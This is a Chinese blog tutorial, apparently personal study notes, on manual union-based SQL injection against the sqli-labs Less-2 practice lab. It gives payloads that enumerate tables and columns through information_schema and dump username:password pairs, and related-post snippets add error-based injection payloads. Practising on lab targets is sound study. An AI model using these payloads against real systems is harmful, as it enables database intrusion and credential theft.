3-sql注入之Mysql手工注入

最新推荐文章于 2024-04-15 11:38:11 发布
最新推荐文章于 2024-04-15 11:38:11 发布
阅读量544 收藏 9
点赞数 7
分类专栏: SQL注入 文章标签: sql mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62978778/article/details/135400793
版权

文章目录

sql注入之Mysql手工注入

练习靶场为sqli-labs第二关数字型注入

sqli-labs数字型注入

image.png

在url中输入id值,执行查询sql语句。即可得到对应数据

less-2源码分析:

image.png

浏览器 进行数据提交 服务器 :

get 提交  :  url   数据长度 
     速度快  
	 用于: 

post 提交 : 服务器    安全性   数据量

注入流程

image.png

注入语句

手工注入:
		SQL注入: 
		1.判断有无注入点   and 1 = 1true 
		随便输入内容  ==  报错  注入
		              ==  没有注入
		2.猜解列名数量 order by %20 空格
		字段 43.报错,判断回显点 union 
		4.信息收集 
		  数据库版本 version()
		  高版本:5.0  
			系统库: infromation 。。。
		  数据库名称:database()
		  低版本:5.0 
		5.使用对应SQL进行注入  
			数据库库名:security
		. 下一级  
		infromation_schema.tables 查找表名  
		table_name
		查询serurity库下面 所有的表名 

		database()


		= 前后 连到一起
		union select 1,group_concat(table_name),3 from information_schema.tables
		where table_schema=database()

		表: users
		如何查询表里面有那些字段? 
		user 字符 转行 16进制
		union select 1,group_concat(column_name),3 from information_schema.columns
		where table_name=0x7573657273

		username  password  字段数据  
		select username,password from users
		0x3a  :
		union select 1,2,(select group_concat(username,0x3a,password)from users)
on select 1,2,(select group_concat(username,0x3a,password)from users)
星星程序猿
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、...手工注入漏洞测试(MySQL数据库)、SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入(时间注入)等...
我的白帽之路-SQL注入之数字型注入sqli-labs Less-2】
Offsett的博客
02-27 377
我的白帽之路
pikachu靶场第十六关——sqli数字型注入(post)(附代码审计)
最新发布
yzasts的博客
04-15 1149
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
SQL注入漏洞 | 数字型
weixin_52116519的博客
11-28 805
SQL注入漏洞 | iwebsec。
MySQL-数字类型自增是真的坑
weixin_45893571的博客
05-06 1286
在进行表结构设计时,数字类型是最为常见的类型之一,但要用好数字类型并不如想象得那么简单,比如: 怎么设计一个互联网海量并发业务的自增主键?用 INT 就够了? 怎么设计账户的余额?用 DECIMAL 类型就万无一失了吗? 以上全错! 数字类型看似简单,但在表结构架构设计中很容易出现上述“设计上思考不全面”的问题(特别是在海量并发的互联网场景下) 数字类型 整数类型 MySQL 数据库支持 SQL 标准支持的整型类型:INT、SMALLINT。此外,MySQL 数据库也支持诸如 TINYINT、M
网络安全进阶学习第十课——MySQL手工注入
p36273的博客
08-02 2213
多了一列选项,由于正确就会执行sleep(1),所以相应时间最长的那一个就是正确的结果,这里就是14。这样就知道security这个数据库里面所有的表名字:emails,referers,uagents,users。现在这样子就知道了users这个表的所有字段名,假设知道了字段是:id,username,password。好了这样就知道所有的表名字是:emails,referers,uagents,users。,这个函数第二个参数要是有特殊字符是会报错的,这里0x7e是“~”的URL编码。
网络安全-实验六-SQL注入-基本手工注入.docx
11-10
SQL注入是一种常见的网络安全威胁,它利用了不安全的Web应用程序中的设计缺陷,使得攻击者能够通过构造特定的SQL语句来操纵或访问数据库。在实验六中,我们将深入理解并实践这种攻击方式,以提高对网络安全的认识。 ...
sql server 2008 mysql 手工注入
03-25
手工注入,特别是SQL注入,是一种常见的安全漏洞,它允许攻击者通过构造恶意SQL语句来操纵或获取数据库中的敏感信息。在这个主题中,我们将深入探讨这两种数据库系统的SQL注入及其防范方法。 首先,SQL注入的原理是...
手工注入常用SQL语句.txt
07-18
这些知识点主要涉及不同的数据库类型(如Access、MSSQLMySQL)及其相应的手工注入技巧。以下是对这些知识点的详细解析: ### 1. 手工SQL注入基础概念 在进行手工SQL注入之前,我们需要了解SQL注入的基本原理。...
PHP、mysql手工注入
10-12
【PHP与MySQL手工注入详解】 在互联网开发中,PHP与MySQL是常见的服务器端脚本语言和数据库管理系统,广泛应用于网站的构建。然而,随着技术的发展,网络安全问题也日益凸显,其中“手工注入”就是一种针对PHP与...
SQL 数字型注入详解 + iwebsec实例
m0_50917178的博客
12-04 6372
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、SQL 数字型注入原理二、使用步骤1.引入库2.读入数据总结 前言 本文为作者的学习笔记。其中详细记载了作者对于SQL 数字型注入的理解,同时也介绍了利用union联合查询注入成功的完整过程。本文最后作者利用iwebsec和Webgoat两个平台来进行实战。如果有不足之处,欢迎指正。 提示:以下是本篇文章正文内容,下面案例可供参考 一、SQL 数字型注入原理 当输入的参数为整型时例如:ID、年龄等。如果此时存在注入漏洞,
sqli-labs练习(第二关)——数字型
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-17 1743
1、先判断是字符型还是数字型。 172.16.11.222/sqli-labs/Less-2/?id=1 id=2-1 与 id=1的结果一样,说明是数字型。 2、确认字段位数 172.16.11.222/sqli-labs/Less-2/?id=1 order by 3 一共3位 3、确认占位信息 172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,3 --+ 4、找库名 http://172.16.11.222/sqli-labs/Less-
mysql 手工sql注入_SQL注入手工篇)
weixin_33461476的博客
02-01 248
开发人员在开发Web系统时对输入的数据没有进行有效的验证及过滤,就存在引发SQL注入漏洞的可能,并导致查看、插入、删除数据库的数据,甚至可以执行主机系统命令。1.可能出现asp?id=x的网站只能是基于asp、PHP、jsp、aspx的动态网站,并且存在数据库交互,例:登陆、留言板、搜索、新闻。但是静态页面不可以,如html、htm。2.漏洞测试(1)单引号测试:在页面中执行命令时使用成对单引号和...
mysql 低版本注入_MySQL暴错注入方法整理
weixin_39780784的博客
01-19 238
1、通过floor暴错/*数据库版本*/http://www.waitalone.cn/sql.php?id=1+and(select 1 from(selectcount(*),concat((select (select (select concat(0x7e,version(),0x7e)))from information_schema.tables limit 0,1),floor(ra...
updatexml mysql_深入浅出带你玩转sqlilabs(四)-updatexml(),floor(),extractvalue()报错注入
weixin_39942108的博客
01-30 503
SQL各种参数类型下的注入测试数字型-sqlilabs less2前面文章已演示过字符型-sqlilabs less1前面文章已演示过搜索型-自写测试如:www.test.com/index.php?id=1www.test.com/index.php?id=abc(搜索型,一般产生在网站的搜索框)http://www.test.com/search.php?q=1区分参数类型的原因:当参数类型为...
mysql 数字注入_SQL数字型注入(mysql数据库)
weixin_33196555的博客
01-19 562
好像并没有什么特别的东西。用工具进行全站扫描,查看是否有其他页面存在。结果我们一共扫出了三个页面,一个静态页面,两个动态页面。排除静态页面,login.php是我们刚刚看见的后台登陆页面,我们打开这个new_list.php看看。结果我们可以发现,一片空白,也就是说我们在向服务器请求获取页面的时候,页面没有获取成功,也就是差参数。盲猜试试id=1,这个时候发现页面正常显示了。猜测该注入是数字型的注...
sql注入--数字型
pakho_C的博客
01-01 2173
sql注入–数字型 靶场:sqli-labs-master 下载链接:靶场下载链接 第二关php源码 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connectio
SQLi 数字型注入
Lu__xiao的博客
02-17 3404
使用SQLi-Labs网站的Less-2为入口,利用联合查询(union select)的方式实施SQL注入,获取SQLi-Labs网站的登陆用户名和密码 环境: Windows 10、火狐浏览器、HackBar、SQLi-Labs 进入Less-2 2. 使用HackBar 先定一个GET参数 http://192.168.5.145/sql/Less-2/?id=1 页面回显id=1的用户名和密码 3. 判断注入点 (1)http://192.168.5.1.
sqli-libs————Less2(数字型注入
Fly_鹏程万里
05-08 1188
Less2同样,我们根据提示传入参数id,数据类型为numeric加入单引号进行测试:爆出错误提示信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' ...
SQL手工注入技巧解析与实战
"这篇文档是关于SQL手工注入的总结笔记,旨在帮助读者了解和学习SQL注入的基本技巧和方法。" SQL注入是一种常见的网络安全攻击手段,它利用了应用程序对用户输入数据处理不当的情况,通过构造恶意的SQL语句,来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星星程序猿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值